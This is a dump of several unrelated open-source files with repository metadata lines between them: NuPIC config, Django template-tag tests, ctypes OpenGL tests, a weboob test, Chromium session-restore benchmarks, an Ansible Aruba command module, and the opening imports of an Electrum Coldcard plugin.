# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
'inputWidth': 0,
# SP inhibition control (absolute value);
# Maximum number of active columns in the SP region's output (when
# there are more, the weaker ones are suppressed)
'numActiveColumnsPerInhArea': 40,
'seed': 1956,
# potentialPct
# What percent of the columns's receptive field is available
# for potential synapses. At initialization time, we will
# choose potentialPct * (2*potentialRadius+1)^2
'potentialPct': 0.5,
# The default connected threshold. Any synapse whose
# permanence value is above the connected threshold is
# a "connected synapse", meaning it can contribute to the
# cell's firing. Typical value is 0.10. Cells whose activity
# level before inhibition falls below minDutyCycleBeforeInh
# will have their own internal synPermConnectedCell
# threshold set below this default value.
# (This concept applies to both SP and TP and so 'cells'
# is correct here as opposed to 'columns')
'synPermConnected': 0.1,
'synPermActiveInc': 0.1,
'synPermInactiveDec': 0.01,
},
# Controls whether TP is enabled or disabled;
# TP is necessary for making temporal predictions, such as predicting
# the next inputs. Without TP, the model is only capable of
# reconstructing missing sensor inputs (via SP).
'tpEnable' : True,
'tpParams': {
# TP diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
# (see verbosity in nupic/trunk/py/nupic/research/TP.py and TP10X*.py)
'verbosity': 0,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
# The number of cells (i.e., states), allocated per column.
'cellsPerColumn': 32,
'inputWidth': 2048,
'seed': 1960,
# Temporal Pooler implementation selector (see _getTPClass in
# CLARegion.py).
'temporalImp': 'cpp',
# New Synapse formation count
# NOTE: If None, use spNumActivePerInhArea
#
# TODO: need better explanation
'newSynapseCount': 15,
# Maximum number of synapses per segment
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSynapsesPerSegment': 32,
# Maximum number of segments per cell
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSegmentsPerCell': 128,
# Initial Permanence
# TODO: need better explanation
'initialPerm': 0.21,
# Permanence Increment
'permanenceInc': 0.1,
# Permanence Decrement
# If set to None, will automatically default to tpPermanenceInc
# value.
'permanenceDec' : 0.1,
'globalDecay': 0.0,
'maxAge': 0,
# Minimum number of active synapses for a segment to be considered
# during search for the best-matching segments.
# None=use default
# Replaces: tpMinThreshold
'minThreshold': 12,
# Segment activation threshold.
# A segment is active if it has >= tpSegmentActivationThreshold
# connected synapses that are active due to infActiveState
# None=use default
# Replaces: tpActivationThreshold
'activationThreshold': 16,
'outputType': 'normal',
# "Pay Attention Mode" length. This tells the TP how many new
# elements to append to the end of a learned sequence at a time.
# Smaller values are better for datasets with short sequences,
# higher values are better for datasets with long sequences.
'pamLength': 1,
},
'clParams': {
'regionName' : 'CLAClassifierRegion',
# Classifier diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
'clVerbosity' : 0,
# This controls how fast the classifier learns/forgets. Higher values
# make it adapt faster and forget older patterns faster.
'alpha': 0.001,
# This is set after the call to updateConfigFromSubConfig and is
# computed from the aggregationInfo and predictAheadTime.
'steps': '1',
},
'trainSPNetOnlyIfRequested': False,
},
}
# end of config dictionary
# Adjust base config dictionary for any modifications if imported from a
# sub-experiment
updateConfigFromSubConfig(config)
# Compute predictionSteps based on the predictAheadTime and the aggregation
# period, which may be permuted over.
if config['predictAheadTime'] is not None:
predictionSteps = int(round(aggregationDivide(
config['predictAheadTime'], config['aggregationInfo'])))
assert (predictionSteps >= 1)
config['modelParams']['clParams']['steps'] = str(predictionSteps)
# Adjust config by applying ValueGetterBase-derived
# futures. NOTE: this MUST be called after updateConfigFromSubConfig() in order
# to support value-getter-based substitutions from the sub-experiment (if any)
applyValueGettersToContainer(config)
control = {
# The environment that the current model is being run in
"environment": 'nupic',
# Input stream specification per py/nupicengine/cluster/database/StreamDef.json.
#
'dataset' : { u'info': u'test_NoProviders',
u'streams': [ { u'columns': [u'*'],
u'info': u'test data',
u'source': u'file://swarming/test_data.csv'}],
u'version': 1},
# Iteration count: maximum number of iterations. Each iteration corresponds
# to one record from the (possibly aggregated) dataset. The task is
# terminated when either number of iterations reaches iterationCount or
# all records in the (possibly aggregated) database have been processed,
# whichever occurs first.
#
# iterationCount of -1 = iterate over the entire dataset
#'iterationCount' : ITERATION_COUNT,
# Metrics: A list of MetricSpecs that instantiate the metrics that are
# computed for this experiment
'metrics':[
MetricSpec(field=u'consumption',
inferenceElement=InferenceElement.prediction,
metric='rmse'),
],
# Logged Metrics: A sequence of regular expressions that specify which of
# the metrics from the Inference Specifications section MUST be logged for
# every prediction. The regex's correspond to the automatically generated
# metric labels. This is similar to the way the optimization metric is
# specified in permutations.py.
'loggedMetrics': ['.*nupicScore.*'],
}
descriptionInterface = ExperimentDescriptionAPI(modelConfig=config,
control=control)
| agpl-3.0 | -5,583,674,659,747,028,000 | 36.860526 | 110 | 0.607701 | false |
ABaldwinHunter/django-clone-classic | tests/template_tests/test_custom.py | 116 | 19622 | from __future__ import unicode_literals
import os
from unittest import skipUnless
from django.template import Context, Engine, TemplateSyntaxError
from django.template.base import Node
from django.template.library import InvalidTemplateLibrary
from django.test import SimpleTestCase
from django.test.utils import extend_sys_path
from django.utils import six
from .templatetags import custom, inclusion
from .utils import ROOT
LIBRARIES = {
'custom': 'template_tests.templatetags.custom',
'inclusion': 'template_tests.templatetags.inclusion',
}
class CustomFilterTests(SimpleTestCase):
def test_filter(self):
engine = Engine(libraries=LIBRARIES)
t = engine.from_string("{% load custom %}{{ string|trim:5 }}")
self.assertEqual(
t.render(Context({"string": "abcdefghijklmnopqrstuvwxyz"})),
"abcde"
)
class TagTestCase(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.engine = Engine(app_dirs=True, libraries=LIBRARIES)
super(TagTestCase, cls).setUpClass()
def verify_tag(self, tag, name):
self.assertEqual(tag.__name__, name)
self.assertEqual(tag.__doc__, 'Expected %s __doc__' % name)
self.assertEqual(tag.__dict__['anything'], 'Expected %s __dict__' % name)
class SimpleTagTests(TagTestCase):
def test_simple_tags(self):
c = Context({'value': 42})
templates = [
('{% load custom %}{% no_params %}', 'no_params - Expected result'),
('{% load custom %}{% one_param 37 %}', 'one_param - Expected result: 37'),
('{% load custom %}{% explicit_no_context 37 %}', 'explicit_no_context - Expected result: 37'),
('{% load custom %}{% no_params_with_context %}',
'no_params_with_context - Expected result (context value: 42)'),
('{% load custom %}{% params_and_context 37 %}',
'params_and_context - Expected result (context value: 42): 37'),
('{% load custom %}{% simple_two_params 37 42 %}', 'simple_two_params - Expected result: 37, 42'),
('{% load custom %}{% simple_one_default 37 %}', 'simple_one_default - Expected result: 37, hi'),
('{% load custom %}{% simple_one_default 37 two="hello" %}',
'simple_one_default - Expected result: 37, hello'),
('{% load custom %}{% simple_one_default one=99 two="hello" %}',
'simple_one_default - Expected result: 99, hello'),
('{% load custom %}{% simple_one_default 37 42 %}',
'simple_one_default - Expected result: 37, 42'),
('{% load custom %}{% simple_unlimited_args 37 %}', 'simple_unlimited_args - Expected result: 37, hi'),
('{% load custom %}{% simple_unlimited_args 37 42 56 89 %}',
'simple_unlimited_args - Expected result: 37, 42, 56, 89'),
('{% load custom %}{% simple_only_unlimited_args %}', 'simple_only_unlimited_args - Expected result: '),
('{% load custom %}{% simple_only_unlimited_args 37 42 56 89 %}',
'simple_only_unlimited_args - Expected result: 37, 42, 56, 89'),
('{% load custom %}{% simple_unlimited_args_kwargs 37 40|add:2 56 eggs="scrambled" four=1|add:3 %}',
'simple_unlimited_args_kwargs - Expected result: 37, 42, 56 / eggs=scrambled, four=4'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
for entry in templates:
t = self.engine.from_string("%s as var %%}Result: {{ var }}" % entry[0][0:-2])
self.assertEqual(t.render(c), "Result: %s" % entry[1])
def test_simple_tag_errors(self):
errors = [
("'simple_one_default' received unexpected keyword argument 'three'",
'{% load custom %}{% simple_one_default 99 two="hello" three="foo" %}'),
("'simple_two_params' received too many positional arguments",
'{% load custom %}{% simple_two_params 37 42 56 %}'),
("'simple_one_default' received too many positional arguments",
'{% load custom %}{% simple_one_default 37 42 56 %}'),
("'simple_unlimited_args_kwargs' received some positional argument(s) after some keyword argument(s)",
'{% load custom %}{% simple_unlimited_args_kwargs 37 40|add:2 eggs="scrambled" 56 four=1|add:3 %}'),
("'simple_unlimited_args_kwargs' received multiple values for keyword argument 'eggs'",
'{% load custom %}{% simple_unlimited_args_kwargs 37 eggs="scrambled" eggs="scrambled" %}'),
]
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string(entry[1])
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string("%s as var %%}" % entry[1][0:-2])
def test_simple_tag_escaping_autoescape_off(self):
c = Context({'name': "Jack & Jill"}, autoescape=False)
t = self.engine.from_string("{% load custom %}{% escape_naive %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_naive_escaping(self):
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_naive %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_explicit_escaping(self):
# Check we don't double escape
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_explicit %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_format_html_escaping(self):
# Check we don't double escape
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_format_html %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(custom.no_params, 'no_params')
self.verify_tag(custom.one_param, 'one_param')
self.verify_tag(custom.explicit_no_context, 'explicit_no_context')
self.verify_tag(custom.no_params_with_context, 'no_params_with_context')
self.verify_tag(custom.params_and_context, 'params_and_context')
self.verify_tag(custom.simple_unlimited_args_kwargs, 'simple_unlimited_args_kwargs')
self.verify_tag(custom.simple_tag_without_context_parameter, 'simple_tag_without_context_parameter')
def test_simple_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'simple_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load custom %}{% simple_tag_without_context_parameter 123 %}')
class InclusionTagTests(TagTestCase):
def test_inclusion_tags(self):
c = Context({'value': 42})
templates = [
('{% load inclusion %}{% inclusion_no_params %}', 'inclusion_no_params - Expected result\n'),
('{% load inclusion %}{% inclusion_one_param 37 %}', 'inclusion_one_param - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_explicit_no_context 37 %}',
'inclusion_explicit_no_context - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_no_params_with_context %}',
'inclusion_no_params_with_context - Expected result (context value: 42)\n'),
('{% load inclusion %}{% inclusion_params_and_context 37 %}',
'inclusion_params_and_context - Expected result (context value: 42): 37\n'),
('{% load inclusion %}{% inclusion_two_params 37 42 %}',
'inclusion_two_params - Expected result: 37, 42\n'),
(
'{% load inclusion %}{% inclusion_one_default 37 %}',
'inclusion_one_default - Expected result: 37, hi\n'
),
('{% load inclusion %}{% inclusion_one_default 37 two="hello" %}',
'inclusion_one_default - Expected result: 37, hello\n'),
('{% load inclusion %}{% inclusion_one_default one=99 two="hello" %}',
'inclusion_one_default - Expected result: 99, hello\n'),
('{% load inclusion %}{% inclusion_one_default 37 42 %}',
'inclusion_one_default - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_unlimited_args 37 %}',
'inclusion_unlimited_args - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_unlimited_args 37 42 56 89 %}',
'inclusion_unlimited_args - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_only_unlimited_args %}',
'inclusion_only_unlimited_args - Expected result: \n'),
('{% load inclusion %}{% inclusion_only_unlimited_args 37 42 56 89 %}',
'inclusion_only_unlimited_args - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 40|add:2 56 eggs="scrambled" four=1|add:3 %}',
'inclusion_unlimited_args_kwargs - Expected result: 37, 42, 56 / eggs=scrambled, four=4\n'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
def test_inclusion_tag_errors(self):
errors = [
("'inclusion_one_default' received unexpected keyword argument 'three'",
'{% load inclusion %}{% inclusion_one_default 99 two="hello" three="foo" %}'),
("'inclusion_two_params' received too many positional arguments",
'{% load inclusion %}{% inclusion_two_params 37 42 56 %}'),
("'inclusion_one_default' received too many positional arguments",
'{% load inclusion %}{% inclusion_one_default 37 42 56 %}'),
("'inclusion_one_default' did not receive value(s) for the argument(s): 'one'",
'{% load inclusion %}{% inclusion_one_default %}'),
("'inclusion_unlimited_args' did not receive value(s) for the argument(s): 'one'",
'{% load inclusion %}{% inclusion_unlimited_args %}'),
(
"'inclusion_unlimited_args_kwargs' received some positional argument(s) "
"after some keyword argument(s)",
'{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 40|add:2 eggs="boiled" 56 four=1|add:3 %}',
),
("'inclusion_unlimited_args_kwargs' received multiple values for keyword argument 'eggs'",
'{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 eggs="scrambled" eggs="scrambled" %}'),
]
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string(entry[1])
def test_include_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'inclusion_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load inclusion %}{% inclusion_tag_without_context_parameter 123 %}')
def test_inclusion_tags_from_template(self):
c = Context({'value': 42})
templates = [
('{% load inclusion %}{% inclusion_no_params_from_template %}',
'inclusion_no_params_from_template - Expected result\n'),
('{% load inclusion %}{% inclusion_one_param_from_template 37 %}',
'inclusion_one_param_from_template - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_explicit_no_context_from_template 37 %}',
'inclusion_explicit_no_context_from_template - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_no_params_with_context_from_template %}',
'inclusion_no_params_with_context_from_template - Expected result (context value: 42)\n'),
('{% load inclusion %}{% inclusion_params_and_context_from_template 37 %}',
'inclusion_params_and_context_from_template - Expected result (context value: 42): 37\n'),
('{% load inclusion %}{% inclusion_two_params_from_template 37 42 %}',
'inclusion_two_params_from_template - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_one_default_from_template 37 %}',
'inclusion_one_default_from_template - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_one_default_from_template 37 42 %}',
'inclusion_one_default_from_template - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_unlimited_args_from_template 37 %}',
'inclusion_unlimited_args_from_template - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_unlimited_args_from_template 37 42 56 89 %}',
'inclusion_unlimited_args_from_template - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_only_unlimited_args_from_template %}',
'inclusion_only_unlimited_args_from_template - Expected result: \n'),
('{% load inclusion %}{% inclusion_only_unlimited_args_from_template 37 42 56 89 %}',
'inclusion_only_unlimited_args_from_template - Expected result: 37, 42, 56, 89\n'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
def test_inclusion_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(inclusion.inclusion_no_params, 'inclusion_no_params')
self.verify_tag(inclusion.inclusion_one_param, 'inclusion_one_param')
self.verify_tag(inclusion.inclusion_explicit_no_context, 'inclusion_explicit_no_context')
self.verify_tag(inclusion.inclusion_no_params_with_context, 'inclusion_no_params_with_context')
self.verify_tag(inclusion.inclusion_params_and_context, 'inclusion_params_and_context')
self.verify_tag(inclusion.inclusion_two_params, 'inclusion_two_params')
self.verify_tag(inclusion.inclusion_one_default, 'inclusion_one_default')
self.verify_tag(inclusion.inclusion_unlimited_args, 'inclusion_unlimited_args')
self.verify_tag(inclusion.inclusion_only_unlimited_args, 'inclusion_only_unlimited_args')
self.verify_tag(inclusion.inclusion_tag_without_context_parameter, 'inclusion_tag_without_context_parameter')
self.verify_tag(inclusion.inclusion_tag_use_l10n, 'inclusion_tag_use_l10n')
self.verify_tag(inclusion.inclusion_unlimited_args_kwargs, 'inclusion_unlimited_args_kwargs')
def test_15070_use_l10n(self):
"""
Test that inclusion tag passes down `use_l10n` of context to the
Context of the included/rendered template as well.
"""
c = Context({})
t = self.engine.from_string('{% load inclusion %}{% inclusion_tag_use_l10n %}')
self.assertEqual(t.render(c).strip(), 'None')
c.use_l10n = True
self.assertEqual(t.render(c).strip(), 'True')
def test_no_render_side_effect(self):
"""
#23441 -- InclusionNode shouldn't modify its nodelist at render time.
"""
engine = Engine(app_dirs=True, libraries=LIBRARIES)
template = engine.from_string('{% load inclusion %}{% inclusion_no_params %}')
count = template.nodelist.get_nodes_by_type(Node)
template.render(Context({}))
self.assertEqual(template.nodelist.get_nodes_by_type(Node), count)
def test_render_context_is_cleared(self):
"""
#24555 -- InclusionNode should push and pop the render_context stack
when rendering. Otherwise, leftover values such as blocks from
extending can interfere with subsequent rendering.
"""
engine = Engine(app_dirs=True, libraries=LIBRARIES)
template = engine.from_string('{% load inclusion %}{% inclusion_extends1 %}{% inclusion_extends2 %}')
self.assertEqual(template.render(Context({})).strip(), 'one\ntwo')
class AssignmentTagTests(TagTestCase):
def test_assignment_tags(self):
c = Context({'value': 42})
t = self.engine.from_string('{% load custom %}{% assignment_no_params as var %}The result is: {{ var }}')
self.assertEqual(t.render(c), 'The result is: assignment_no_params - Expected result')
def test_assignment_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(custom.assignment_no_params, 'assignment_no_params')
def test_assignment_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'assignment_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load custom %}{% assignment_tag_without_context_parameter 123 as var %}')
class TemplateTagLoadingTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.egg_dir = os.path.join(ROOT, 'eggs')
super(TemplateTagLoadingTests, cls).setUpClass()
def test_load_error(self):
msg = (
"Invalid template library specified. ImportError raised when "
"trying to load 'template_tests.broken_tag': cannot import name "
"'?Xtemplate'?"
)
with six.assertRaisesRegex(self, InvalidTemplateLibrary, msg):
Engine(libraries={
'broken_tag': 'template_tests.broken_tag',
})
def test_load_error_egg(self):
egg_name = '%s/tagsegg.egg' % self.egg_dir
msg = (
"Invalid template library specified. ImportError raised when "
"trying to load 'tagsegg.templatetags.broken_egg': cannot "
"import name '?Xtemplate'?"
)
with extend_sys_path(egg_name):
with six.assertRaisesRegex(self, InvalidTemplateLibrary, msg):
Engine(libraries={
'broken_egg': 'tagsegg.templatetags.broken_egg',
})
def test_load_working_egg(self):
ttext = "{% load working_egg %}"
egg_name = '%s/tagsegg.egg' % self.egg_dir
with extend_sys_path(egg_name):
engine = Engine(libraries={
'working_egg': 'tagsegg.templatetags.working_egg',
})
engine.from_string(ttext)
@skipUnless(six.PY3, "Python 3 only -- Python 2 doesn't have annotations.")
def test_load_annotated_function(self):
Engine(libraries={
'annotated_tag_function': 'template_tests.annotated_tag_function',
})
| bsd-3-clause | -6,156,823,158,680,823 | 51.605898 | 118 | 0.608552 | false |
lokirius/python-for-android | python3-alpha/python3-src/Lib/ctypes/test/test_find.py | 65 | 2470 | import unittest
import sys
from ctypes import *
from ctypes.util import find_library
from ctypes.test import is_resource_enabled
if sys.platform == "win32":
lib_gl = find_library("OpenGL32")
lib_glu = find_library("Glu32")
lib_gle = None
elif sys.platform == "darwin":
lib_gl = lib_glu = find_library("OpenGL")
lib_gle = None
else:
lib_gl = find_library("GL")
lib_glu = find_library("GLU")
lib_gle = find_library("gle")
## print, for debugging
if is_resource_enabled("printing"):
if lib_gl or lib_glu or lib_gle:
print("OpenGL libraries:")
for item in (("GL", lib_gl),
("GLU", lib_glu),
("gle", lib_gle)):
print("\t", item)
# On some systems, loading the OpenGL libraries needs the RTLD_GLOBAL mode.
class Test_OpenGL_libs(unittest.TestCase):
def setUp(self):
self.gl = self.glu = self.gle = None
if lib_gl:
self.gl = CDLL(lib_gl, mode=RTLD_GLOBAL)
if lib_glu:
self.glu = CDLL(lib_glu, RTLD_GLOBAL)
if lib_gle:
try:
self.gle = CDLL(lib_gle)
except OSError:
pass
if lib_gl:
def test_gl(self):
if self.gl:
self.gl.glClearIndex
if lib_glu:
def test_glu(self):
if self.glu:
self.glu.gluBeginCurve
if lib_gle:
def test_gle(self):
if self.gle:
self.gle.gleGetJoinStyle
##if os.name == "posix" and sys.platform != "darwin":
## # On platforms where the default shared library suffix is '.so',
## # at least some libraries can be loaded as attributes of the cdll
## # object, since ctypes now tries loading the lib again
## # with '.so' appended of the first try fails.
## #
## # Won't work for libc, unfortunately. OTOH, it isn't
## # needed for libc since this is already mapped into the current
## # process (?)
## #
## # On MAC OSX, it won't work either, because dlopen() needs a full path,
## # and the default suffix is either none or '.dylib'.
## class LoadLibs(unittest.TestCase):
## def test_libm(self):
## import math
## libm = cdll.libm
## sqrt = libm.sqrt
## sqrt.argtypes = (c_double,)
## sqrt.restype = c_double
## self.assertEqual(sqrt(2), math.sqrt(2))
if __name__ == "__main__":
unittest.main()
| apache-2.0 | 962,078,443,507,699,300 | 29.121951 | 77 | 0.562753 | false |
yannrouillard/weboob | modules/prixcarburants/test.py | 5 | 1088 | # -*- coding: utf-8 -*-
# Copyright(C) 2012 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.test import BackendTest
class PrixCarburantsTest(BackendTest):
BACKEND = 'prixcarburants'
def test_prixcarburants(self):
products = list(self.backend.search_products('gpl'))
self.assertTrue(len(products) == 1)
prices = list(self.backend.iter_prices(products[0]))
self.backend.fillobj(prices[0])
| agpl-3.0 | -7,769,473,672,478,221,000 | 33 | 77 | 0.729779 | false |
CyanogenMod/android_external_chromium_org | tools/perf/benchmarks/session_restore.py | 8 | 2414 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import tempfile
from measurements import session_restore
from measurements import session_restore_with_url
import page_sets
from profile_creators import small_profile_creator
from telemetry import test
from telemetry.page import profile_generator
class _SessionRestoreTest(test.Test):
@classmethod
def ProcessCommandLineArgs(cls, parser, args):
super(_SessionRestoreTest, cls).ProcessCommandLineArgs(parser, args)
profile_type = 'small_profile'
if not args.browser_options.profile_dir:
profile_dir = os.path.join(tempfile.gettempdir(), profile_type)
if not os.path.exists(profile_dir):
new_args = args.Copy()
new_args.pageset_repeat = 1
new_args.output_dir = profile_dir
profile_generator.GenerateProfiles(
small_profile_creator.SmallProfileCreator, profile_type, new_args)
args.browser_options.profile_dir = os.path.join(profile_dir, profile_type)
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreColdTypical25(_SessionRestoreTest):
tag = 'cold'
test = session_restore.SessionRestore
page_set = page_sets.Typical25PageSet
options = {'cold': True,
'pageset_repeat': 5}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWarmTypical25(_SessionRestoreTest):
tag = 'warm'
test = session_restore.SessionRestore
page_set = page_sets.Typical25PageSet
options = {'warm': True,
'pageset_repeat': 20}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWithUrlCold(_SessionRestoreTest):
"""Measure Chrome cold session restore with startup URLs."""
tag = 'cold'
test = session_restore_with_url.SessionRestoreWithUrl
page_set = page_sets.StartupPagesPageSet
options = {'cold': True,
'pageset_repeat': 5}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWithUrlWarm(_SessionRestoreTest):
"""Measure Chrome warm session restore with startup URLs."""
tag = 'warm'
test = session_restore_with_url.SessionRestoreWithUrl
page_set = page_sets.StartupPagesPageSet
options = {'warm': True,
'pageset_repeat': 10}
| bsd-3-clause | -5,938,513,011,298,622,000 | 34.5 | 80 | 0.726181 | false |
daenamkim/ansible | lib/ansible/modules/network/aruba/aruba_command.py | 17 | 6873 | #!/usr/bin/python
#
# Copyright: Ansible Team
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: aruba_command
version_added: "2.4"
author: "James Mighion (@jmighion)"
short_description: Run commands on remote devices running Aruba Mobility Controller
description:
- Sends arbitrary commands to an aruba node and returns the results
read from the device. This module includes an
argument that will cause the module to wait for a specific condition
before returning or timing out if the condition is not met.
- This module does not support running commands in configuration mode.
Please use M(aruba_config) to configure Aruba devices.
extends_documentation_fragment: aruba
options:
commands:
description:
- List of commands to send to the remote aruba device over the
configured provider. The resulting output from the command
is returned. If the I(wait_for) argument is provided, the
module is not returned until the condition is satisfied or
the number of retries has expired.
required: true
wait_for:
description:
- List of conditions to evaluate against the output of the
command. The task will wait for each condition to be true
before moving forward. If the conditional is not true
within the configured number of retries, the task fails.
See examples.
required: false
default: null
aliases: ['waitfor']
match:
description:
- The I(match) argument is used in conjunction with the
I(wait_for) argument to specify the match policy. Valid
values are C(all) or C(any). If the value is set to C(all)
then all conditionals in the wait_for must be satisfied. If
the value is set to C(any) then only one of the values must be
satisfied.
required: false
default: all
choices: ['any', 'all']
retries:
description:
- Specifies the number of retries a command should by tried
before it is considered failed. The command is run on the
target device every retry and evaluated against the
I(wait_for) conditions.
required: false
default: 10
interval:
description:
- Configures the interval in seconds to wait between retries
of the command. If the command does not pass the specified
conditions, the interval indicates how long to wait before
trying the command again.
required: false
default: 1
"""
EXAMPLES = """
tasks:
- name: run show version on remote devices
aruba_command:
commands: show version
- name: run show version and check to see if output contains Aruba
aruba_command:
commands: show version
wait_for: result[0] contains Aruba
- name: run multiple commands on remote nodes
aruba_command:
commands:
- show version
- show interfaces
- name: run multiple commands and evaluate the output
aruba_command:
commands:
- show version
- show interfaces
wait_for:
- result[0] contains Aruba
- result[1] contains Loopback0
"""
RETURN = """
stdout:
description: The set of responses from the commands
returned: always
type: list
sample: ['...', '...']
stdout_lines:
description: The value of stdout split into a list
returned: always
type: list
sample: [['...', '...'], ['...'], ['...']]
failed_conditions:
description: The list of conditionals that have failed
returned: failed
type: list
sample: ['...', '...']
"""
import time
from ansible.module_utils.network.aruba.aruba import run_commands
from ansible.module_utils.network.aruba.aruba import aruba_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import ComplexList
from ansible.module_utils.network.common.parsing import Conditional
from ansible.module_utils.six import string_types
def to_lines(stdout):
for item in stdout:
if isinstance(item, string_types):
item = str(item).split('\n')
yield item
def parse_commands(module, warnings):
command = ComplexList(dict(
command=dict(key=True),
prompt=dict(),
answer=dict()
), module)
commands = command(module.params['commands'])
for index, item in enumerate(commands):
if module.check_mode and not item['command'].startswith('show'):
warnings.append(
'only show commands are supported when using check mode, not '
'executing `%s`' % item['command']
)
elif item['command'].startswith('conf'):
module.fail_json(
msg='aruba_command does not support running config mode '
'commands. Please use aruba_config instead'
)
return commands
def main():
"""main entry point for module execution
"""
argument_spec = dict(
commands=dict(type='list', required=True),
wait_for=dict(type='list', aliases=['waitfor']),
match=dict(default='all', choices=['all', 'any']),
retries=dict(default=10, type='int'),
interval=dict(default=1, type='int')
)
argument_spec.update(aruba_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
warnings = list()
check_args(module, warnings)
commands = parse_commands(module, warnings)
result['warnings'] = warnings
wait_for = module.params['wait_for'] or list()
conditionals = [Conditional(c) for c in wait_for]
retries = module.params['retries']
interval = module.params['interval']
match = module.params['match']
while retries > 0:
responses = run_commands(module, commands)
for item in list(conditionals):
if item(responses):
if match == 'any':
conditionals = list()
break
conditionals.remove(item)
if not conditionals:
break
time.sleep(interval)
retries -= 1
if conditionals:
failed_conditions = [item.raw for item in conditionals]
msg = 'One or more conditional statements have not be satisfied'
module.fail_json(msg=msg, failed_conditions=failed_conditions)
result.update({
'changed': False,
'stdout': responses,
'stdout_lines': list(to_lines(responses))
})
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -5,229,550,708,341,911,000 | 30.099548 | 92 | 0.645715 | false |
fujicoin/electrum-fjc | electrum/plugins/coldcard/coldcard.py | 2 | 26391 | #
# Coldcard Electrum plugin main code.
#
#
from struct import pack, unpack
import os, sys, time, io
import traceback
from electrum.bip32 import BIP32Node, InvalidMasterKeyVersionBytes
from electrum.i18n import _
from electrum.plugin import Device
